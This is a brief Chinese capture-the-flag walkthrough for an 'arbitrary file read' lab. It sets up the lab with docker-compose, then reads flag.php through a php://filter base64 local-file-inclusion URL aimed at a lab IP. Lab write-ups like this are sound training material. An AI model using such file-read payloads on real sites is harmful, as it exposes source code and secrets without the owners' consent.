01ctfer/任意文件读取/afr_1
靶场启动
编辑文件 docker-compose.yml
vim docker-compose.yml
写入以下内容
version: '3.2'
services:
web:
image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
ports:
- 80:80
启动靶场,等待拉取完成
docker-compose up -d
访问靶场
访问开启 docker 的 kali 的 ip,自动跳转到 /?p=hello
在 hello 后加后缀 .php 无法访问
猜词其在参数后自动追加 .php
查看 flag.php
查看 flag.php 源码
http://10.9.47.101/?p=php://filter/read=convert.base64-encode/resource=flag
解码